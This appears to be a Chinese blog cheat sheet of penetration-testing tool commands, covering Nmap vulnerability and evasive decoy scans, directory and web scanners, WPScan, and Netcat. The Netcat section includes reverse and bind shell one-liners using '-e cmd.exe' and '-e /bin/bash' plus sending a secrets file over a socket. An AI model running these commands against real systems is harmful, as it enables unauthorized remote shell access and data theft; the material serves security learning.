超全渗透测试工具实战使用技巧合集

1.NMAP

Nmap是一款枚举和测试网络的强大工具,有主机探测、端口扫描、版本检测、系统检测以及支持探测脚本编写等功能。

Nmap下载安装地址:https://nmap.org/download.html#purpleheader

①漏洞扫描

cd /usr/share/nmap/scripts/       //切换到指定目录
wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz  //下载并解压


nmap -sS -sV --script=vulscan/vulscan.nse target
nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target
nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target
nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target
nmap -sV --script=vuln target
nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target

②Nmap端口扫描

1)生成随机数量的欺骗
2)爆破
3)打包数据 – 就像原始的一个不扫描数据包
4)nmap -sI [Zombie IP] [Target IP]僵尸网络扫描, 首先需要找到僵尸网络的IP
5)nmap –source-port 53 target  指定源端口号


nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP)
nmap -Pn -T2 -sV –randomize-hosts IP1,IP2
nmap –script smb-check-vulns.nse -p445 target (using NSE scripts)
nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5)
nmap -sA -PN -sN target
nmap -sS -sV -T5 -F -A -O target (version detection)
nmap -sU -v target (Udp)
nmap -sU -P0 (Udp)
nmap -sC 192.168.31.10-12 (all scan default)

2.Dirb 目录扫描

DIRB是一款目录扫描工具,内置于Kali,可发现潜在的渗透目标。基本上,它是通过对Web服务器发起基于字典的攻击并分析响应来工作的。

DIRB下载地址:https://sourceforge.net/projects/dirb/files/

拓展学习:https://www.cnblogs.com/yyxianren/p/11520489.html

dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt

注:正常扫描格式为:dirb 目标 字典路径

3.Nikto 网页服务器扫描

Nikto是一款开源的网页服务器扫描器,它可以对网页服务器进行全面的多种扫描,包含超过3300种有潜在危险的文件CGIs;超过625种服务器版本;超过230种特定服务器问题。

源码下载:https://github.com/sullo/nikto

安装及简单使用教程:https://www.cnblogs.com/opama/p/4928657.html

nikto -C all -h http://IP

注:-C 指定CGI目录 –all表示猜解CGI目录 -h 指定目标

4.WordPress扫描

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。

源码下载:https://github.com/wpscanteam/wpscan.git

git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
./wpscan –url http://IP/ –enumerate p

注:wpscan –url #扫描基本信息

5.HTTP指纹识别

Net-Square 的Httprint工具,是一个自动化的http指纹分析工具,带有可定制web服务器指纹数据库,运用统计学原理,组合逻辑学技术,可有效识别Http服务器的类型。

下载地址:http://www.net-square.com/_assets/httprint_linux_301.zip

wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip    //下载并解压压缩文件包
cd httprint_301/linux/          //切换到指定目录
./httprint -h http://IP -s signatures.txt     // -h指定网站链接 -s 指定一个包含http签名的文件,默认就是signatures.txt

6.Skipfish扫描器

Skipfish是一款主动的Web应用程序安全侦察工具。它通过执行递归爬取和基于字典的探测来为目标站点准备交互式站点地图。最终的地图然后用来自许多活动(但希望是不中断的)安全检查的输出来注释。该工具生成的最终报告旨在作为专业Web应用程序安全评估的基础。

下载地址:http://code.google.com/p/skipfish

拓展学习资料:https://my.oschina.net/u/995648/blog/114321

skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP

注:参数 -m:表示每个ip最大并发连接数。参数-L:不自动学习网站的新关键字。参数-Y:不要模糊目录brute forc中的扩展。参数 -s:加载附加只读字典。参数 -o:将输出写入指定目录(必需)。

7.NC扫描

NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end)工具,能被其它的程序程序或脚本直接地或容易地驱动。同时,它又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能。NetCat,它的实际可运行的名字叫nc,应该早很就被提供,就象另一个没有公开但是标准的Unix工具。

下载网址:http://www.atstake.com/research/tools/network_utilities/

拓展学习:https://blog.csdn.net/xysoul/article/details/52270149?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-14&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-14

nc -v -w 1 target -z 1-1000
for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done

注:参数-v:显示详细的输出内容。

①Netcat的一些用法

c:> nc -l -p 31337     
#nc 192.168.0.10 31337
c:> nc -v -w 30 -p 31337 -l < secret.txt
#nc -v -w 2 192.168.0.10 31337 > secret.txt

②用NC抓banner

nc 192.168.0.10 80
GET / HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/4.0
Referrer: www.example.com
<enter>
<enter>

③使用 NC 在 Windows 上反弹 shell

c:>nc -Lp 31337 -vv -e cmd.exe
nc 192.168.0.10 31337
c:>nc example.com 80 -e cmd.exe
nc -lp 80
 
nc -lp 31337 -e /bin/bash
nc 192.168.0.10 31337
nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000

8.Unicornscan收集网络信息

Unicornscan是一款通过尝试连接用户系统(User-land)分布式TCP/IP堆栈获得信息和关联关系的端口扫描器。它主要功能包括带有所有TCP变种标记的异步无状态TCP扫描、异步无状态TCP标志捕获、通过分析反馈信息获取主动/被动远程操作系统、应用程序、组件信息。

网站主页:http://www.unicornscan.org/

拓展学习:https://sanppz.com/2019/11/30/Unicornscan%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F/#%E4%BB%80%E4%B9%88%E6%98%AFUnicornscan%EF%BC%9F

us -H -msf -Iv 192.168.56.101 -p 1-65535
us -H -mU -Iv 192.168.56.101 -p 1-65535


-H 在生成报告阶段解析主机名
-m 扫描类型 (sf - tcp, U - udp)
-Iv - 详细

9.Xprobe2识别操作系统指纹

xprobe2是一款远程主机操作系统探测工具。

网站主页:http://xprobe.sourceforge.net/oldindex.html

下载地址:https://sourceforge.net/projects/xprobe/files/latest/download

拓展学习:

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

chosennnny

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值